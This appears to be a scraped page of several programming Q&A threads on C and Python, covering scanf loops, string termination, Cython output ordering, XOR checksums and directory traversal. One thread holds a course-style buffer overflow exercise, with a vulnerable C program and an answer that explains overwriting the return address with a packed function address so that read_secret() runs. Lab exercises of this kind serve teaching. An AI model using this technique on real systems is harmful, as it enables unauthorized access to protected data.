For loop in C breaks randomly - python

I've been struggling with this loop in C for a while now. I'm trying to create a string array through a for loop (which I'm not sure I'm doing correctly. I hope I am). Every time I enter a string with a space in it, the for loop breaks and skips all iterations. For example, if I write S 1 in the command line, it would break.
This is the code:
#include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <string.h>
int main(){
int players;
int jerseys;
int count = 0;
int i;
scanf("%d", &jerseys);
scanf("%d", &players);
char size[jerseys], p[players][100];
for(jerseys; jerseys > 0; jerseys--){
scanf(" %c", &size[count]);
count++;
}
getchar();
count = 0;
for(players; players>0; players--){
/*scanf(" %s", p[0] ); */ /*you cant assign arrays in C.*/
getchar();
fgets(p[count], 100, stdin);
printf("%s", p[count]);
printf("%s", p[count][2]); /* LINE 29 */
printf("Hello\n");
count ++;
}
return 0;
}
Moreover, on line 29, if I change the index from 2 to 1, the loop instantly breaks, no matter what I put.
I have a python code for what I essentially want from C:
given = []
jerseys = int(input())
if jerseys == 0:
print(0)
players = int(input())
j = []
requests = 0
for _ in range(jerseys):
size = input()
j.append(size)
for _ in range(players):
p = input().split()
I've looked at many places, and I think the problem is with the array, not the new lines, but I have no clue.
Edit:
This is something that would look like what I want to input(and what I usually try):
3
3
S
M
L
S 1
S 3
L 2

If the input characters do not match the control characters or are of the wrong type for a formatted input scanf terminates leaving the offending character as the next character to be read.
If you write 1` in the command line, then jerseys set to 1, but players is a random int because the ` not match the %d format. So in you program, your players variable may be a big int.
So when you use scanf, you'd better to check the return value like
if ((scanf("%d", &players) != 1) {
/* error handle */
}
I run the code and segmentation fault is raise.

the posted code does not cleanly compile!
Here is the output from the gcc compiler:
gcc -ggdb3 -Wall -Wextra -Wconversion -pedantic -std=gnu11 -c "untitled.c" -o "untitled.o"
untitled.c: In function ‘main’:
untitled.c:17:5: warning: statement with no effect [-Wunused-value]
17 | for(jerseys; jerseys > 0; jerseys--){
| ^~~
untitled.c:24:5: warning: statement with no effect [-Wunused-value]
24 | for(players; players>0; players--){
| ^~~
untitled.c:29:18: warning: format ‘%s’ expects argument of type ‘char *’, but argument 2 has type ‘int’ [-Wformat=]
29 | printf("%s", p[count][2]); /* LINE 29 */
| ~^ ~~~~~~~~~~~
| | |
| char * int
| %d
untitled.c:10:9: warning: unused variable ‘i’ [-Wunused-variable]
10 | int i;
| ^
Compilation finished successfully.
Please correct the code AND check the returned status from the C library I/O functions
Regarding:
Compilation finished successfully.
since the compiler output several warnings, This statement only means the compiler made some (not necessarily correct) guesses as to what you meant.

Related

If all strings either need a length or null terminator, how do high level languages just construct a string with chars?

So I am writing some C code to play around with mocking up a scripting language.
I ran into a scenario where if I run a function to import a file, say import("file.c") I run into an issue where I can not necessarily use a pointer because it is not null terminated. I would also need to give the length of the string like import("file.c", 5) or use a null terminating character import("file.c\0"). I assume using a buffer is the way to go with a fixed size such as char file_name[256] which probably covers a file name large enough. But that raises some interesting questions regarding 'higher' level programming languages like say Python or Golang. So Golong's imports look like this from a internet search:
import (
"fmt"
"math"
)
I would assume the libraries are being treated as string, no? What about Python?
import pandas as pd
import math
import functools
Are those also being treated as strings? At least, to me, I would assume golang's imports are.
But let's forget imports entirely. What about just strings?
Python's string is:
s = "I like Apple Pie"
I saw here that strings in golang are defined as:
type _string struct {
elements *byte // underlying bytes
len int // number of bytes
}
Then the next segment of code says:
const World = "world"
where there is no len specified. What gives?
How does golang, or in general, 'higher' level languages make use of strings without having to specify a null terminated string or the length with a number? Or am I missing something entirely?
I come from a Python background with some C but it seems pretty similar in most programming languages today.
The fact that you don't write string length or the null terminating character for a string literal does not mean that it cannot be done automatically: the compiler can do it (because it knows the string length at compilation time) and is very likely doing it.
For example in C:
The null character ('\0', L'\0', char16_t(), etc) is always
appended to the string literal: thus, a string literal "Hello" is a
const char[6] holding the characters 'H', 'e', 'l', 'l', 'o', and
'\0'.
Here is a small C program that show that null character is appended to string literal:
#include <stdio.h>
#include <string.h>
int main()
{
char *p="hello";
int i;
i = 0;
while (p[i] != '\0')
{
printf("%c ", p[i]);
i++;
}
printf("\nstrlen(p)=%ld\n", strlen(p));
return 0;
}
Execution:
./hello
h e l l o
strlen(p)=5
You can also compile the program in debug mode with:
gcc -g -o hello -Wall -pedantic -Wextra hello.c
and check with gdb:
gdb hello
...
(gdb) b main
Breakpoint 1 at 0x400585: file hello.c, line 6.
(gdb) r
Starting program: /home/pifor/c/hello
Breakpoint 1, main () at hello.c:6
6 char *p="hello";
(gdb) n
9 i = 0;
(gdb) print *(p+5)
$7 = 0 '\000'
(gdb) print *(p+4)
$8 = 111 'o'
(gdb) print *p
$10 = 104 'h'
A string value in Go is a pointer to bytes and a length. Here's Go's definition of the type:
type StringHeader struct {
Data uintptr
Len int
}
In the case of a string literal like "world", the compiler counts the bytes to set the length. The literal is represented by StringHeader{Data: pointerToBytesWorld, Len: 5} at runtime.
The length is implicit in the slice operands for a string value through a slice expression:
s := "Hello"
s = s[1:4] // length is 4 - 1 = 3
String conversions take the length from the operand:
b := []byte{'F', 'o', 'p'}
s = string(b) // length is 3, same as len(b)

Buffer overflow attack, executing an uncalled function

So, I'm trying to exploit this program that has a buffer overflow vulnerability to get/return a secret behind a locked .txt (read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void read_secret() {
FILE *fptr = fopen("/task2/secret.txt", "r");
char secret[1024];
fscanf(fptr, "%512s", secret);
printf("Well done!\nThere you go, a wee reward: %s\n", secret);
exit(0);
}
int fib(int n)
{
if ( n == 0 )
return 0;
else if ( n == 1 )
return 1;
else
return ( fib(n-1) + fib(n-2) );
}
void vuln(char *name)
{
int n = 20;
char buf[1024];
int f[n];
int i;
for (i=0; i<n; i++) {
f[i] = fib(i);
}
strcpy(buf, name);
printf("Welcome %s!\n", buf);
for (i=0; i<20; i++) {
printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
}
}
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Tell me your names, tricksy hobbitses!\n");
return 0;
}
// printf("main function at %p\n", main);
// printf("read_secret function at %p\n", read_secret);
vuln(argv[1]);
return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I print large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, and returns to the read_secret function, instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, but I'm kinda confused. I know that I would have to replace the main() address with the read_secret function's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability you have to first identify the offset at which you can get a segfault. In your case I assume its 1026. The whole game is to overwrite the eip(what tells the program what to do next) and then add your own instruction.
To add your own instruction you need to know the address of said instruction and then so in gdb open your program and then type in:
x function name
Then copy the address. You then have to convert it to big or little endian format. I do it with the struct module in python.
import struct
struct.pack("<I", address) # for little endian for big endian its different
Then you have to add it to your input to the binary so something like:
python -c "print 'a' * 1026 + 'the_address'" | /task2/vuln
#on bash shell, not in script
If all of this doesnt work then just add a few more characters to your offset. There might be something you didnt see coming.
python -c "print 'a' * 1034 + 'the_address'" | /task2/vuln
Hope that answers your question.

Cython print() outputs before C printf(), even when placed afterwards

I'm trying to pick up Cython.
import counter
cdef public void increment():
counter.increment()
cdef public int get():
return counter.get()
cdef public void say(int times):
counter.say(times)
This is the "glue code" I'm using to call functions from counter.py, a pure Python source code file. It's laid out like this:
count = 0
def increment():
global count
count += 1
def get():
global count
return count
def say(times):
global count
print(str(count) * times)
I have successfully compiled and run this program. The functions work fine. However, a very strange thing occured when I tested this program:
int main(int argc, char *argv[]) {
Py_Initialize();
// The following two lines add the current working directory
// to the environment variable `PYTHONPATH`. This allows us
// to import Python modules in this directory.
PyRun_SimpleString("import sys");
PyRun_SimpleString("sys.path.append(\".\")");
PyInit_glue();
// Tests
for (int i = 0; i < 10; i++)
{
increment();
}
int x = get();
printf("Incremented %d times\n", x);
printf("The binary representation of the number 42 is");
say(3);
Py_Finalize();
return 0;
}
I would expect the program to produce this output:
Incremented 10 times
The binary representation of the number 42 is
101010
However, it prints this:
Incremented 10 times
101010
The binary representation of the number 42 is
But if I change the line
printf("The binary representation of the number 42 is");
to
printf("The binary representation of the number 42 is\n");
then the output is corrected.
This seems strange to me. I understand that if I want to print the output of a Python function, I might just as well return it to C and store it in a variable, and use C's printf() rather than the native Python print(). But I would be very interested to hear the reason this is happening. After all, the printf() statement is reached before the say() statement (I double checked this in gdb just to make sure). Thanks for reading.

Python: XOR each character in a string

I'm trying to validate a checksum on a string which in this case is calculated by performing an XOR on each of the individual characters.
Given my test string:
check_against = "GPGLL,5300.97914,N,00259.98174,E,125926,A"
I figured it would be as simple as:
result = 0
for char in check_against:
result = result ^ ord(char)
I know the result should be 28, however my code gives 40.
I'm not sure what encoding the text is suppose to be in, although I've tried encoding/decoding in utf-8 and ascii, both with the same result.
I implemented this same algorithm in C by simply doing an XOR over the char array with perfect results, so what am I missing?
Edit
So it was a little while ago that I implemented (what I thought) was the same thing in C. I knew it was in an Objective-C project but I thought I had just done it this way. Totally wrong, first there was a step where I converted the checksum string value at the end to hex like so (I'm filling some things in here so that I'm only pasting what is relevant):
unsigned int checksum = 0;
NSScanner *scanner = [NSScanner scannerWithString:#"26"];
[scanner scanHexInt:&checksum];
Then I did the following to compute the checksum:
NSString sumString = #"GPGLL,5300.97914,N,00259.98174,E,125926,A";
unsigned int sum = 0;
for (int i=0;i<sumString.length;i++) {
sum = sum ^ [sumString characterAtIndex:i];
}
Then I would just compare like so:
return sum == checksum;
So as #metatoaster, #XD573, and some others in the comments have helped figure out, the issue was the difference between the result, which was base 10, and my desired solution (in base 16).
The result for the code, 40 is correct - in base 10, however my correct value I was trying to achieve, 28 is given in base 16. Simply converting the solution from base 16 to base 10, for example like so:
int('28', 16)
I get 40, the computed result.
#python3
str = "GPGLL,5300.97914,N,00259.98174,E,125926,A"
cks = 0
i = 0
while(i<len(str)):
cks^=ord(str[i])
i+=1
print("hex:",hex(cks))
print("dec:",cks)
I created the C version as shown here:
#include <stdio.h>
#include <string.h>
int main()
{
char* str1="GPGLL,5300.97914,N,00259.98174,E,125926,A";
int sum = 0;
int i = 0;
for (i; i < strlen(str1); i++) {
sum ^= str1[i];
}
printf("checksum: %d\n", sum);
return 0;
}
And When I compiled and ran it:
$ gcc -o mytest mytest.c
$ ./mytest
checksum: 40
Which leads me to believe that the assumptions you have from your equivalent C code are incorrect.

Reasonably faster way to traverse a directory tree in Python?

Assuming that the given directory tree is of reasonable size: say an open source project like Twisted or Python, what is the fastest way to traverse and iterate over the absolute path of all files/directories inside that directory?
I want to do this from within Python. os.path.walk is slow. So I tried ls -lR and tree -fi. For a project with about 8337 files (including tmp, pyc, test, .svn files):
$ time tree -fi > /dev/null
real 0m0.170s
user 0m0.044s
sys 0m0.123s
$ time ls -lR > /dev/null
real 0m0.292s
user 0m0.138s
sys 0m0.152s
$ time find . > /dev/null
real 0m0.074s
user 0m0.017s
sys 0m0.056s
$
tree appears to be faster than ls -lR (though ls -R is faster than tree, but it does not give full paths). find is the fastest.
Can anyone think of a faster and/or better approach? On Windows, I may simply ship a 32-bit binary tree.exe or ls.exe if necessary.
Update 1: Added find
Update 2: Why do I want to do this? ... I am trying to make a smart replacement for cd, pushd, etc.. and wrapper commands for other commands relying on passing paths (less, more, cat, vim, tail). The program will use file traversal occasionally to do that (eg: typing "cd sr grai pat lxml" would automatically translate to "cd src/pypm/grail/patches/lxml"). I won't be satisfied if this cd replacement took, say, half a second to run. See http://github.com/srid/pf
Your approach in pf is going to be hopelessly slow, even if os.path.walk took no time at all. Doing a regex match containing 3 unbounded closures across all extant paths will kill you right there. Here is the code from Kernighan and Pike that I referenced, this is a proper algorithm for the task:
/* spname: return correctly spelled filename */
/*
* spname(oldname, newname) char *oldname, *newname;
* returns -1 if no reasonable match to oldname,
* 0 if exact match,
* 1 if corrected.
* stores corrected name in newname.
*/
#include <sys/types.h>
#include <sys/dir.h>
spname(oldname, newname)
char *oldname, *newname;
{
char *p, guess[DIRSIZ+1], best[DIRSIZ+1];
char *new = newname, *old = oldname;
for (;;) {
while (*old == '/') /* skip slashes */
*new++ = *old++;
*new = '\0';
if (*old == '\0') /* exact or corrected */
return strcmp(oldname,newname) != 0;
p = guess; /* copy next component into guess */
for ( ; *old != '/' && *old != '\0'; old++)
if (p < guess+DIRSIZ)
*p++ = *old;
*p = '\0';
if (mindist(newname, guess, best) >= 3)
return -1; /* hopeless */
for (p = best; *new = *p++; ) /* add to end */
new++; /* of newname */
}
}
mindist(dir, guess, best) /* search dir for guess */
char *dir, *guess, *best;
{
/* set best, return distance 0..3 */
int d, nd, fd;
struct {
ino_t ino;
char name[DIRSIZ+1]; /* 1 more than in dir.h */
} nbuf;
nbuf.name[DIRSIZ] = '\0'; /* +1 for terminal '\0' */
if (dir[0] == '\0') /* current directory */
dir = ".";
d = 3; /* minimum distance */
if ((fd=open(dir, 0)) == -1)
return d;
while (read(fd,(char *) &nbuf,sizeof(struct direct)) > 0)
if (nbuf.ino) {
nd = spdist(nbuf.name, guess);
if (nd <= d && nd != 3) {
strcpy(best, nbuf.name);
d = nd;
if (d == 0) /* exact match */
break;
}
}
close(fd);
return d;
}
/* spdist: return distance between two names */
/*
* very rough spelling metric:
* 0 if the strings are identical
* 1 if two chars are transposed
* 2 if one char wrong, added or deleted
* 3 otherwise
*/
#define EQ(s,t) (strcmp(s,t) == 0)
spdist(s, t)
char *s, *t;
{
while (*s++ == *t)
if (*t++ == '\0')
return 0; /* exact match */
if (*--s) {
if (*t) {
if (s[1] && t[1] && *s == t[1]
&& *t == s[1] && EQ(s+2, t+2))
return 1; /* transposition */
if (EQ(s+1, t+1))
return 2; /* 1 char mismatch */
}
if (EQ(s+1, t))
return 2; /* extra character */
}
if (*t && EQ(s, t+1))
return 2; /* missing character */
return 3;
}
Note: this code was written way before ANSI C, ISO C, or POSIX anything was even imagined when one read directory files raw. The approach of the code is far more useful than all the pointer slinging.
It would be hard to get much better than find in performance, but the question is how much faster and why do you need it to be so fast? You claim that os.path.walk is slow, indeed, it is ~3 times slower on my machine over a tree of 16k directories. But then again, we're talking about the difference between 0.68 seconds and 1.9 seconds for Python.
If setting a speed record is your goal, you can't beat hard coded C which is completely 75% system call bound and you can't make the OS go faster. That said, 25% of the Python time is spent in system calls. What is it that you want to do with the traversed paths?
One solution you have not mentioned is 'os.walk'. I'm not sure it'd be any faster than os.path.walk, but it's objectively better.
You have not said what you're going to do with the list of directories when you have it, so it's hard to give more specific suggestions.
Although I doubt you have multiple read heads, here's how you can traverse a few million files (we've done 10M+ in a few minutes).
https://github.com/hpc/purger/blob/master/src/treewalk/treewalk.c

Categories